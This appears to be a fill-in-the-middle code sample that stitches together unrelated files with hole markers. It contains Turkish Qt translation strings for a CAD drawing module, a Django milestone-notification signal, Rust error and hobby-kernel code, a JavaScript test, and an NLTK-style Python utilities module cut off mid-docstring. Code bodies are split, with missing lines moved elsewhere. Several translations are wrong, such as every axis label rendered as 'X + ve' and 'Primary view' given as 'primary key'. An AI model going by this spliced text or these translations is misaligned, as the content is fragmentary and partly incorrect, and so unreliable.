<location filename="../../DrawingView.cpp" line="538"/>
<location filename="../../DrawingView.cpp" line="551"/>
<source>A3</source>
<translation>A3</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="540"/>
<location filename="../../DrawingView.cpp" line="553"/>
<source>A4</source>
<translation>A4</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="542"/>
<location filename="../../DrawingView.cpp" line="555"/>
<source>A5</source>
<translation>A5</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="666"/>
<source>Different orientation</source>
<translation>Ekran yönü</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="667"/>
<source>The printer uses a different orientation than the drawing.
Do you want to continue?</source>
<translation>Yazıcı çizimden farklı bir yönlendirme kullanıyor.
Devam etmek istiyor musun?</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="674"/>
<location filename="../../DrawingView.cpp" line="682"/>
<source>Different paper size</source>
<translation>Farklı kağıt boyutu</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="675"/>
<location filename="../../DrawingView.cpp" line="683"/>
<source>The printer uses a different paper size than the drawing.
Do you want to continue?</source>
<translation>Yazıcı, çizimden farklı bir kağıt boyutu kullanıyor.
Devam etmek istiyor musun?</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="694"/>
<source>Opening file failed</source>
<translation>Dosya açılamadı</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="695"/>
<source>Can't open file '%1' for writing.</source>
<translation>Dosya '%1' yazmak için açılamıyor.</translation>
</message>
</context>
<context>
<name>DrawingGui::TaskOrthoViews</name>
<message>
<location filename="../../TaskOrthoViews.ui" line="26"/>
<source>Orthographic Projection</source>
<translation>Dik çizgisel izdüşüm</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="46"/>
<location filename="../../TaskOrthoViews.ui" line="71"/>
<location filename="../../TaskOrthoViews.ui" line="96"/>
<location filename="../../TaskOrthoViews.ui" line="121"/>
<location filename="../../TaskOrthoViews.ui" line="146"/>
<location filename="../../TaskOrthoViews.ui" line="177"/>
<location filename="../../TaskOrthoViews.ui" line="202"/>
<location filename="../../TaskOrthoViews.ui" line="227"/>
<location filename="../../TaskOrthoViews.ui" line="252"/>
<location filename="../../TaskOrthoViews.ui" line="277"/>
<location filename="../../TaskOrthoViews.ui" line="302"/>
<location filename="../../TaskOrthoViews.ui" line="362"/>
<source>Right click for axonometric settings</source>
<translation>Aksonometrik ayarlar için sağ tıklayın</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="324"/>
<source>Primary view</source>
<translation>Birincil anahtar</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="340"/>
<source>Secondary Views</source>
<translation>İkincil Metin</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="412"/>
<source>General</source>
<translation>Genel</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="421"/>
<source>Auto scale / position</source>
<translation>Otomatik ölçek / konum</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="436"/>
<source>Scale</source>
<translation>Ölçek</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="468"/>
<source>Top left x / y</source>
<translation>«Ana sayfa» sol x / y</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="516"/>
<source>Spacing dx / dy</source>
<translation>Aralığı dx / dy</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="561"/>
<source>Show hidden lines</source>
<translation>Gizli çizgileri göster</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="568"/>
<source>Show smooth lines</source>
<translation>Düzgün çizgileri göster</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="579"/>
<source>Axonometric</source>
<translation>Aksonometrik</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="587"/>
<source>Axis out and right</source>
<translation>Eksen dışarı ve sağ</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="594"/>
<source>Vertical tilt</source>
<translation>Dikey eğim</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="605"/>
<location filename="../../TaskOrthoViews.ui" line="805"/>
<source>X +ve</source>
<translation>X + ve</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="610"/>
<location filename="../../TaskOrthoViews.ui" line="685"/>
<location filename="../../TaskOrthoViews.ui" line="810"/>
<source>Y +ve</source>
<translation>X + ve</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="615"/>
<location filename="../../TaskOrthoViews.ui" line="690"/>
<location filename="../../TaskOrthoViews.ui" line="815"/>
<source>Z +ve</source>
<translation>X + ve</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="620"/>
<location filename="../../TaskOrthoViews.ui" line="820"/>
<source>X -ve</source>
<translation>X + ve</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="625"/>
<location filename="../../TaskOrthoViews.ui" line="695"/>
<location filename="../../TaskOrthoViews.ui" line="825"/>
<source>Y -ve</source>
<translation>X + ve</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="630"/>
<location filename="../../TaskOrthoViews.ui" line="700"/>
<location filename="../../TaskOrthoViews.ui" line="830"/>
<source>Z -ve</source>
<translation>X + ve</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="642"/>
<source>Isometric</source>
<translation>İzometrik</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="647"/>
<source>Dimetric</source>
<translation>Dimetrik</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="652"/>
<source>Trimetric</source>
<translation>Trimetrik</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="660"/>
<source> Scale</source>
<translation> Ölçekler</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="667"/>
<source>View projection</source>
<translation>İzdüşümü görüntüle</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="674"/>
<source> Axis aligned up</source>
<translation> Eksen hizaya getirildi</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="715"/>
<location filename="../../TaskOrthoViews.ui" line="738"/>
<source>Flip</source>
<translation>Çevir</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="728"/>
<source> Trimetric</source>
<translation> Trimetrik</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="756"/>
<source>Projection</source>
<translation>İzdüşümler</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="767"/>
<source>Third Angle</source>
<translation>Üçüncü açı</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="772"/>
<source>First Angle</source>
<translation>İki açıları arasındaki fark</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="791"/>
<source>View from:</source>
<translation>Şu adresten görüntüle:</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="838"/>
<source>Axis aligned right:</source>
<translation>Eksen hizaya getirildi:</translation>
</message>
</context>
<context>
<name>DrawingGui::TaskProjection</name>
<message>
<location filename="../../TaskDialog.cpp" line="51"/>
<source>Visible sharp edges</source>
<translation>Görünür keskin kenarlar</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="52"/>
<source>Visible smooth edges</source>
<translation>Görünür pürüzsüz kenarlar</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="53"/>
<source>Visible sewn edges</source>
<translation>Görünür dikilir kenarlar</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="54"/>
<source>Visible outline edges</source>
<translation>Görünür anahat kenarları</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="55"/>
<source>Visible isoparameters</source>
<translation>Görünür izodeğişkenler</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="56"/>
<source>Hidden sharp edges</source>
<translation>Gizli keskin kenarlar</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="57"/>
<source>Hidden smooth edges</source>
<translation>Gizli pürüzsüz kenarlar</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="58"/>
<source>Hidden sewn edges</source>
<translation>Gizli dikili kenarlar</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="59"/>
<source>Hidden outline edges</source>
<translation>Gizli kenar konturları</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="60"/>
<source>Hidden isoparameters</source>
<translation>Gizli izodeğişkenler</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="77"/>
<source>Project shapes</source>
<translation>Proje şekilleri</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="91"/>
<source>No active document</source>
<translation>Etkin belge yok</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="92"/>
<source>There is currently no active document to complete the operation</source>
<translation>İşlemi tamamlamak için henüz aktif bir belge mevcut değil</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="97"/>
<source>No active view</source>
<translation>Aktif görünüm yok</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="98"/>
<source>There is currently no active view to complete the operation</source>
<translation>İşlemi tamamlamak için halihazırda etkin görüş mevcut değil</translation>
</message>
</context>
<context>
<name>Drawing_NewPage</name>
<message>
<location filename="../../Command.cpp" line="223"/>
<source>Landscape</source>
<translation>Manzara</translation>
</message>
<message>
<location filename="../../Command.cpp" line="225"/>
<source>Portrait</source>
<translation>Dikey</translation>
</message>
<message>
<location filename="../../Command.cpp" line="229"/>
<source>%1%2 %3</source>
<translation>%1%2 %3</translation>
</message>
<message>
<location filename="../../Command.cpp" line="234"/>
<source>Insert new %1%2 %3 drawing</source>
<translation>Yeni %1%2 %3 çizim ekle</translation>
</message>
<message>
<location filename="../../Command.cpp" line="241"/>
<source>%1%2 %3 (%4)</source>
<translation>%1%2 %3 (%4)</translation>
</message>
<message>
<location filename="../../Command.cpp" line="247"/>
<source>Insert new %1%2 %3 (%4) drawing</source>
<translation>Yeni %1%2 %3 (%4) çizim ekle</translation>
</message>
</context>
<context>
<name>QObject</name>
<message>
<location filename="../../Command.cpp" line="72"/>
<location filename="../../Command.cpp" line="595"/>
<source>Choose an SVG file to open</source>
<translation>Açmak için bir SVG dosyası seçin</translation>
</message>
<message>
<location filename="../../Command.cpp" line="73"/>
<location filename="../../Command.cpp" line="596"/>
<location filename="../../Command.cpp" line="654"/>
<source>Scalable Vector Graphic</source>
<translation>Ölçeklenebilir Vektör Grafiği</translation>
</message>
<message>
<location filename="../../Command.cpp" line="327"/>
<location filename="../../Command.cpp" line="406"/>
<location filename="../../Command.cpp" line="456"/>
<location filename="../../Command.cpp" line="648"/>
<location filename="../../Command.cpp" line="772"/>
<source>Wrong selection</source>
<translation>Yanlış seçim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="328"/>
<source>Select a Part object.</source>
<translation>Parça nesnesi seçin.</translation>
</message>
<message>
<location filename="../../Command.cpp" line="336"/>
<location filename="../../Command.cpp" line="415"/>
<location filename="../../Command.cpp" line="496"/>
<location filename="../../Command.cpp" line="544"/>
<location filename="../../Command.cpp" line="589"/>
<location filename="../../Command.cpp" line="778"/>
<source>No page found</source>
<translation>Sayfa bulunamadı</translation>
</message>
<message>
<location filename="../../Command.cpp" line="337"/>
<location filename="../../Command.cpp" line="416"/>
<location filename="../../Command.cpp" line="497"/>
<location filename="../../Command.cpp" line="545"/>
<location filename="../../Command.cpp" line="590"/>
<location filename="../../Command.cpp" line="779"/>
<source>Create a page first.</source>
<translation>Önce bir sayfa oluşturun.</translation>
</message>
<message>
<location filename="../../Command.cpp" line="407"/>
<source>Select exactly one Part object.</source>
<translation>Tek bir bölüm nesnesi seçin.</translation>
</message>
<message>
<location filename="../../Command.cpp" line="457"/>
<location filename="../../Command.cpp" line="649"/>
<source>Select one Page object.</source>
<translation>Bir sayfa nesnesi seçin.</translation>
</message>
<message>
<location filename="../../Command.cpp" line="655"/>
<source>All Files</source>
<translation>Tüm Dosyalar</translation>
</message>
<message>
<location filename="../../Command.cpp" line="657"/>
<source>Export page</source>
<translation>Sayfayı dışarı aktar</translation>
</message>
<message>
<location filename="../../Command.cpp" line="773"/>
<source>Select exactly one Spreadsheet object.</source>
<translation>Tam olarak bir Hesap Tablosu nesnesi seçin.</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.cpp" line="54"/>
<location filename="../../TaskOrthoViews.cpp" line="982"/>
<source>Make axonometric...</source>
<translation>Aksonometrik yap...</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.cpp" line="55"/>
<location filename="../../TaskOrthoViews.cpp" line="983"/>
<source>Edit axonometric settings...</source>
<translation>Aksonometrik ayarlarını düzenle...</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.cpp" line="56"/>
<location filename="../../TaskOrthoViews.cpp" line="984"/>
<source>Make orthographic</source>
<translation>Ortografik yap</translation>
</message>
<message>
<location filename="../../ViewProviderPage.cpp" line="152"/>
<source>Show drawing</source>
<translation>Çizimi göster</translation>
</message>
</context>
<context>
<name>Workbench</name>
<message>
<location filename="../../Workbench.cpp" line="37"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
</context>
</TS><|fim▁end|>
|
<translation>Etkin çizimde bir parçanın yeni görünümünü ekle</translation>
|
<|file_name|>signals.py<|end_file_name|><|fim▁begin|>"""
Django signals for the app.
"""
import logging
from django.db.models.signals import post_save
from django.conf import settings
from django.contrib.sites.models import Site
from .models import Response, UnitLesson
from .ct_util import get_middle_indexes
from core.common.mongo import c_milestone_orct
from core.common.utils import send_email, suspending_receiver
log = logging.getLogger(__name__)
@suspending_receiver(post_save, sender=Response)
def run_courselet_notif_flow(sender, instance, **kwargs):
# TODO: add check that Response has a text, as an obj can be created before a student submits
# TODO: exclude self eval submissions other than a response submission (e.g. "just guessing")
if (instance.kind == Response.ORCT_RESPONSE and not
(instance.unitLesson.kind == UnitLesson.RESOLVES or
instance.is_test or instance.is_preview or not instance.unitLesson.order)):
course = instance.course
course_id = course.id if course else None
instructors = course.get_users(role="prof")
lesson = instance.lesson
lesson_id = lesson.id if lesson else None
student = instance.author
student_id = student.id if student else None
unit_lesson = instance.unitLesson
unit_lesson_id = unit_lesson.id if unit_lesson else None # it's a thread
# Exclude instructors, e.g. the ones submitting in preview mode
for instructor in instructors:
if student_id == instructor.id:
return
# Define if it's a milestone question (either first, middle, or last)
milestone = None
questions = unit_lesson.unit.all_orct()
i = [_[0] for _ in questions.values_list('id')].index(unit_lesson_id)
if i == 0:
milestone = "first"
elif i == len(questions) - 1:
milestone = "last"
elif i in get_middle_indexes(questions):
milestone = "middle" # TODO consider returning a single number
# If milestone, store the record
if milestone:
to_save = {
"milestone": milestone,
"lesson_title": lesson.title if lesson else None,
"lesson_id": lesson_id,
"unit_lesson_id": unit_lesson_id,
"course_title": course.title if course else None,
"course_id": course_id,
"student_username": student.username if student else None,<|fim▁hole|> milestone_orct_answers_cursor = c_milestone_orct(use_secondary=False).find({
"milestone": milestone,
"lesson_id": lesson_id
})
initial_milestone_orct_answers_number = milestone_orct_answers_cursor.count()
milestone_orct_answers = (a for a in milestone_orct_answers_cursor)
already_exists = False
for answer in milestone_orct_answers:
if answer.get("student_id") == student_id:
already_exists = True
break
if not already_exists:
c_milestone_orct(use_secondary=False).save(to_save)
milestone_orct_answers_number = initial_milestone_orct_answers_number + 1
# If N students responded to a milestone question, send an email.
# The threshold holds for each milestone separately.
if milestone_orct_answers_number == settings.MILESTONE_ORCT_NUMBER:
context_data = {
"milestone": milestone,
"students_number": milestone_orct_answers_number,
"course_title": course.title if course else None,
"lesson_title": lesson.title if lesson else None,
"current_site": Site.objects.get_current(),
"course_id": course_id,
"unit_lesson_id": unit_lesson_id,
"courselet_pk": unit_lesson.unit.id if unit_lesson.unit else None
} # pragma: no cover
log.info("""Courselet notification with data:
Course title - {course_title},
Lesson title - {lesson_title},
Students number - {students_number},
Unit lesson id - {unit_lesson_id},
Course id - {course_id},
Milestone - {milestone}
""".format(**context_data)) # pragma: no cover
send_email(
context_data=context_data,
from_email=settings.EMAIL_FROM,
to_email=[instructor.email for instructor in instructors],
template_subject="ct/email/milestone_ortc_notify_subject",
template_text="ct/email/milestone_ortc_notify_text"
)<|fim▁end|>
|
"student_id": student_id,
# "datetime": datetime.datetime.now() # TODO: consider changing to UTC (and making it a timestamp)
}
# Do not store if such `student_id`-`lesson_id` row is already present
|
<|file_name|>error.rs<|end_file_name|><|fim▁begin|>use std::error::Error as StdError;
use std::fmt::{self, Debug, Display, Formatter};
use std::io;
use hyper::Error as HyperError;
use rustc_serialize::json::DecoderError;
use telegram_bot;
pub enum Error {
General(String),
}
impl From<HyperError> for Error {
fn from(e: HyperError) -> Error {
Error::General(e.description().to_owned())
}
}
impl From<DecoderError> for Error {
fn from(e: DecoderError) -> Error {
Error::General(e.description().to_owned())
}
}
impl From<io::Error> for Error {
fn from(e: io::Error) -> Error {
Error::General(e.description().to_owned())
}
}
impl From<telegram_bot::Error> for Error {
fn from(e: telegram_bot::Error) -> Error {
Error::General(e.description().to_owned())
}
}
impl Debug for Error {
fn fmt(&self, f: &mut Formatter) -> Result<(), fmt::Error> {
match *self {
Error::General(ref msg) => write!(f, "error: {}", msg).unwrap(),
};
Ok(())
}
}
impl Display for Error {
fn fmt(&self, f: &mut Formatter) -> Result<(), fmt::Error> {
match *self {
Error::General(ref msg) => write!(f, "error: {}", msg).unwrap(),
};
Ok(())
}
}
impl StdError for Error {
fn description(&self) -> &str {<|fim▁hole|> Error::General(ref msg) => msg,
}
}
}<|fim▁end|>
|
match *self {
|
<|file_name|>lib.rs<|end_file_name|><|fim▁begin|>#![feature(abi_x86_interrupt)]
#![feature(asm)]
#![feature(const_fn, unique)]
#![feature(lang_items)]
#![feature(naked_functions)]
#![no_std]
#![feature(alloc, collections)]
#![feature(core_intrinsics)]
extern crate bit_field;
#[macro_use]
extern crate bitflags;
extern crate raw_cpuid;
#[macro_use]
extern crate lazy_static;
extern crate multiboot2;
extern crate rlibc;
extern crate spin;
extern crate volatile;
extern crate x86_64;
extern crate hole_list_allocator;
extern crate alloc;
extern crate collections;
#[macro_use]
extern crate once;
// Make constants public
pub use consts::*;
#[macro_use]
/// Console handling
pub mod vga_buffer;
/// Kernel message writer
pub mod kernel_messaging;
/// ACPI manager
pub mod acpi;
/// Architecture constants
pub mod consts;
/// Architecture context
pub mod context;
/// Devices management
pub mod device;
/// Memory management
pub mod memory;
/// Interrupt instructions
pub mod interrupts;
/// Initialization and start function
pub mod start;
/// Timer functions
pub mod time;
#[cfg(not(test))]
#[lang = "eh_personality"]
extern "C" fn eh_personality() {}
#[cfg(not(test))]
#[lang = "panic_fmt"]
#[no_mangle]
pub extern "C" fn panic_fmt(fmt: core::fmt::Arguments, file: &'static str, line: u32) -> ! {
println!("\n\nPANIC in {} at line {}:", file, line);
println!(" {}", fmt);
loop {}
}
#[allow(non_snake_case)]
#[no_mangle]<|fim▁hole|>pub extern "C" fn _Unwind_Resume() -> ! {
loop {}
}
/// Enter in usermode.
///
/// This functions never returns.
pub unsafe fn usermode(ip: usize, sp: usize) -> ! {
asm!("
mov ds, ax
mov es, ax
mov fs, bx
mov gs, ax
push rax
push rcx
push rdx
push rsi
push rdi
iretq"
:
: "{rax}"(5 << 3 | 3) // Data segment
"{rbx}"(6 << 3 | 3) // TLS segment
"{rcx}"(sp) // Stack pointer
"{rdx}"(3 << 12 | 1 << 9) // Flags - Set IOPL and interrupt enable flag
"{rsi}"(4 << 3 | 3) // Code segment
"{rdi}"(ip) // Instruction Pointer
:
: "intel", "volatile"
);
unreachable!();
}<|fim▁end|>
| |
<|file_name|>OptionsManager.js<|end_file_name|><|fim▁begin|>/* eslint-env mocha */
import expect from 'expect';
import FunctionChecker from '../src/FunctionChecker.js';
import OptionsManager from '../src/OptionsManager.js';
import Structure from '../src/Structure.js';
describe('optionsManager', () => {
let manager;
beforeEach(() => {
manager = new OptionsManager();
});
context('#constructor', () => {
it('exposes .typeManager', () => {
expect(manager.typeManager).toNotBe(undefined);
});<|fim▁hole|> it('returns a Structure object', () => {
expect(manager.structure('arg1', {type: 'string'})).toBeA(Structure);
});
});
context('#check', () => {
it('returns a FunctionChecker object', () => {
expect(manager.check('customFunc')).toBeA(FunctionChecker);
});
});
});<|fim▁end|>
|
});
context('#structure', () => {
|
<|file_name|>internals.py<|end_file_name|><|fim▁begin|>"""
This file is part of L3Morpho.
Author: Michael Gasser <[email protected]>
-----------------------------------------------------------------
internals.py is part of
Natural Language Toolkit: Internal utility functions
Copyright (C) 2001-2008 University of Pennsylvania
Author: Steven Bird <[email protected]>
Edward Loper <[email protected]>
URL: <http://www.nltk.org/>
License: <http://creativecommons.org/licenses/by-nc-nd/3.0/us/>
"""
import subprocess, os.path, re, warnings, textwrap
import types
######################################################################
# Regular Expression Processing
######################################################################
def convert_regexp_to_nongrouping(pattern):
"""
Convert all grouping parenthases in the given regexp pattern to
non-grouping parenthases, and return the result. E.g.:
>>> convert_regexp_to_nongrouping('ab(c(x+)(z*))?d')
'ab(?:c(?:x+)(?:z*))?d'
@type pattern: C{str}
@rtype: C{str}
"""
# Sanity check: back-references are not allowed!
for s in re.findall(r'\\.|\(\?P=', pattern):
if s[1] in '0123456789' or s == '(?P=':
raise ValueError('Regular expressions with back-references '
'are not supported: %r' % pattern)
# This regexp substitution function replaces the string '('
# with the string '(?:', but otherwise makes no changes.
def subfunc(m):
return re.sub('^\((\?P<[^>]*>)?$', '(?:', m.group())
# Scan through the regular expression. If we see any backslashed
# characters, ignore them. If we see a named group, then
# replace it with "(?:". If we see any open parens that are part
# of an extension group, ignore those too. But if we see
# any other open paren, replace it with "(?:")
return re.sub(r'''(?x)
\\. | # Backslashed character
\(\?P<[^>]*> | # Named group
\(\? | # Extension group
\( # Grouping parenthasis''', subfunc, pattern)
##########################################################################
# Java Via Command-Line
##########################################################################
_java_bin = None
_java_options = []
def config_java(bin=None, options=None):
"""
Configure nltk's java interface, by letting nltk know where it can
find the C{java} binary, and what extra options (if any) should be
passed to java when it is run.
@param bin: The full path to the C{java} binary. If not specified,
then nltk will search the system for a C{java} binary; and if
one is not found, it will raise a C{LookupError} exception.
@type bin: C{string}
@param options: A list of options that should be passed to the
C{java} binary when it is called. A common value is
C{['-Xmx512m']}, which tells the C{java} binary to increase
the maximum heap size to 512 megabytes. If no options are
specified, then do not modify the options list.
@type options: C{list} of C{string}
"""
global _java_bin, _java_options
if bin is not None:
if not os.path.exists(bin):
raise ValueError('Could not find java binary at %r' % bin)
_java_bin = bin
if options is not None:
if isinstance(options, basestring):
options = options.split()
_java_options = list(options)
# Check the JAVAHOME environment variable.
for env_var in ['JAVAHOME', 'JAVA_HOME']:
if _java_bin is None and env_var in os.environ:
paths = [os.path.join(os.environ[env_var], 'java'),
os.path.join(os.environ[env_var], 'bin', 'java')]
for path in paths:
if os.path.exists(path):
_java_bin = path
print('[Found java: %s]' % path)
# If we're on a POSIX system, try using the 'which' command to
# find a java binary.
if _java_bin is None and os.name == 'posix':
try:
p = subprocess.Popen(['which', 'java'], stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
path = stdout.strip()
if path.endswith('java') and os.path.exists(path):
_java_bin = path
print('[Found java: %s]' % path)
except:
pass
if _java_bin is None:
raise LookupError('Unable to find java! Use config_java() '
'or set the JAVAHOME environment variable.')
def java(cmd, classpath=None, stdin=None, stdout=None, stderr=None):
"""
Execute the given java command, by opening a subprocess that calls
C{java}. If java has not yet been configured, it will be configured
by calling L{config_java()} with no arguments.
@param cmd: The java command that should be called, formatted as
a list of strings. Typically, the first string will be the name
of the java class; and the remaining strings will be arguments
for that java class.
@type cmd: C{list} of C{string}
@param classpath: A C{':'} separated list of directories, JAR
archives, and ZIP archives to search for class files.
@type classpath: C{string}
@param stdin, stdout, stderr: Specify the executed programs'
standard input, standard output and standard error file
handles, respectively. Valid values are C{subprocess.PIPE},
an existing file descriptor (a positive integer), an existing
file object, and C{None}. C{subprocess.PIPE} indicates that a
new pipe to the child should be created. With C{None}, no
redirection will occur; the child's file handles will be
inherited from the parent. Additionally, stderr can be
C{subprocess.STDOUT}, which indicates that the stderr data
from the applications should be captured into the same file
handle as for stdout.
@return: A tuple C{(stdout, stderr)}, containing the stdout and
stderr outputs generated by the java command if the C{stdout}
and C{stderr} parameters were set to C{subprocess.PIPE}; or
C{None} otherwise.
@raise OSError: If the java command returns a nonzero return code.
"""
if isinstance(cmd, basestring):
raise TypeError('cmd should be a list of strings')
# Make sure we know where a java binary is.
if _java_bin is None:
config_java()
# Construct the full command string.
cmd = list(cmd)
if classpath is not None:
cmd = ['-cp', classpath] + cmd
cmd = [_java_bin] + _java_options + cmd
# Call java via a subprocess
p = subprocess.Popen(cmd, stdin=stdin, stdout=stdout, stderr=stderr)<|fim▁hole|> print(stderr)
raise OSError('Java command failed!')
return (stdout, stderr)
if 0:
#config_java(options='-Xmx512m')
# Write:
#java('weka.classifiers.bayes.NaiveBayes',
# ['-d', '/tmp/names.model', '-t', '/tmp/train.arff'],
# classpath='/Users/edloper/Desktop/weka/weka.jar')
# Read:
(a,b) = java(['weka.classifiers.bayes.NaiveBayes',
'-l', '/tmp/names.model', '-T', '/tmp/test.arff',
'-p', '0'],#, '-distribution'],
classpath='/Users/edloper/Desktop/weka/weka.jar')
######################################################################
# Parsing
######################################################################
class ParseError(ValueError):
"""
Exception raised by parse_* functions when they fail.
@param position: The index in the input string where an error occured.
@param expected: What was expected when an error occured.
"""
def __init__(self, expected, position):
ValueError.__init__(self, expected, position)
self.expected = expected
self.position = position
def __str__(self):
return 'Expected %s at %s' % (self.expected, self.position)
_STRING_START_RE = re.compile(r"[uU]?[rR]?(\"\"\"|\'\'\'|\"|\')")
def parse_str(s, start_position):
"""
If a Python string literal begins at the specified position in the
given string, then return a tuple C{(val, end_position)}
containing the value of the string literal and the position where
it ends. Otherwise, raise a L{ParseError}.
"""
# Read the open quote, and any modifiers.
m = _STRING_START_RE.match(s, start_position)
if not m: raise ParseError('open quote', start_position)
quotemark = m.group(1)
# Find the close quote.
_STRING_END_RE = re.compile(r'\\|%s' % quotemark)
position = m.end()
while True:
match = _STRING_END_RE.search(s, position)
if not match: raise ParseError('close quote', position)
if match.group(0) == '\\': position = match.end()+1
else: break
# Parse it, using eval. Strings with invalid escape sequences
# might raise ValueEerror.
try:
return eval(s[start_position:match.end()]), match.end()
except ValueError as e:
raise ParseError('valid string (%s)' % e, start)
_PARSE_INT_RE = re.compile(r'-?\d+')
def parse_int(s, start_position):
"""
If an integer begins at the specified position in the given
string, then return a tuple C{(val, end_position)} containing the
value of the integer and the position where it ends. Otherwise,
raise a L{ParseError}.
"""
m = _PARSE_INT_RE.match(s, start_position)
if not m: raise ParseError('integer', start_position)
return int(m.group()), m.end()
_PARSE_NUMBER_VALUE = re.compile(r'-?(\d*)([.]?\d*)?')
def parse_number(s, start_position):
"""
If an integer or float begins at the specified position in the
given string, then return a tuple C{(val, end_position)}
containing the value of the number and the position where it ends.
Otherwise, raise a L{ParseError}.
"""
m = _PARSE_NUMBER_VALUE.match(s, start_position)
if not m or not (m.group(1) or m.group(2)):
raise ParseError('number', start_position)
if m.group(2): return float(m.group()), m.end()
else: return int(m.group()), m.end()
######################################################################
# Check if a method has been overridden
######################################################################
def overridden(method):
"""
@return: True if C{method} overrides some method with the same
name in a base class. This is typically used when defining
abstract base classes or interfaces, to allow subclasses to define
either of two related methods:
>>> class EaterI:
... '''Subclass must define eat() or batch_eat().'''
... def eat(self, food):
... if overridden(self.batch_eat):
... return self.batch_eat([food])[0]
... else:
... raise NotImplementedError()
... def batch_eat(self, foods):
... return [self.eat(food) for food in foods]
@type method: instance method
"""
# [xx] breaks on classic classes!
if isinstance(method, types.MethodType) and method.im_class is not None:
name = method.__name__
funcs = [cls.__dict__[name]
for cls in _mro(method.im_class)
if name in cls.__dict__]
return len(funcs) > 1
else:
raise TypeError('Expected an instance method.')
def _mro(cls):
"""
Return the I{method resolution order} for C{cls} -- i.e., a list
containing C{cls} and all its base classes, in the order in which
they would be checked by C{getattr}. For new-style classes, this
is just cls.__mro__. For classic classes, this can be obtained by
a depth-first left-to-right traversal of C{__bases__}.
"""
if isinstance(cls, type):
return cls.__mro__
else:
mro = [cls]
for base in cls.__bases__: mro.extend(_mro(base))
return mro
######################################################################
# Deprecation decorator & base class
######################################################################
# [xx] dedent msg first if it comes from a docstring.
def _add_deprecated_field(obj, message):
"""Add a @deprecated field to a given object's docstring."""
indent = ''
# If we already have a docstring, then add a blank line to separate
# it from the new field, and check its indentation.
if obj.__doc__:
obj.__doc__ = obj.__doc__.rstrip()+'\n\n'
indents = re.findall(r'(?<=\n)[ ]+(?!\s)', obj.__doc__.expandtabs())
if indents: indent = min(indents)
# If we don't have a docstring, add an empty one.
else:
obj.__doc__ = ''
obj.__doc__ += textwrap.fill('@deprecated: %s' % message,
initial_indent=indent,
subsequent_indent=indent+' ')
def deprecated(message):
"""
A decorator used to mark functions as deprecated. This will cause
a warning to be printed the when the function is used. Usage:
>>> @deprecated('Use foo() instead')
>>> def bar(x):
... print x/10
"""
def decorator(func):
msg = ("Function %s() has been deprecated. %s"
% (func.__name__, message))
msg = '\n' + textwrap.fill(msg, initial_indent=' ',
subsequent_indent=' ')
def newFunc(*args, **kwargs):
warnings.warn(msg, category=DeprecationWarning, stacklevel=2)
return func(*args, **kwargs)
# Copy the old function's name, docstring, & dict
newFunc.__dict__.update(func.__dict__)
newFunc.__name__ = func.__name__
newFunc.__doc__ = func.__doc__
newFunc.__deprecated__ = True
# Add a @deprecated field to the docstring.
_add_deprecated_field(newFunc, message)
return newFunc
return decorator
class Deprecated(object):
"""
A base class used to mark deprecated classes. A typical usage is to
alert users that the name of a class has changed:
